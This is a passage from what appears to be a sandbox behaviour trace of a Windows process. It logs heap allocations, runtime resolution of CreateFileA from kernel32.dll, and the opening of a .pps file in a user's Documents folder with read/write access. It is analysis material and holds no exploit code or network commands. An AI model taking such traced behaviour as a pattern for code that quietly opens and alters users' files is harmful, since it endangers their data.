0x9b9fa0 [0178.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.077] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.080] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.082] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda98 [0178.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.083] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0178.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.083] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0178.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0178.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", cchWideChar=80, lpMultiByteStr=0x923b28, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpUsedDefaultChar=0x0) returned 80 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.085] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\hvt5kt0pfopfwsd qzn.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0178.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x8f9100, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps") returned 80 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0178.087] 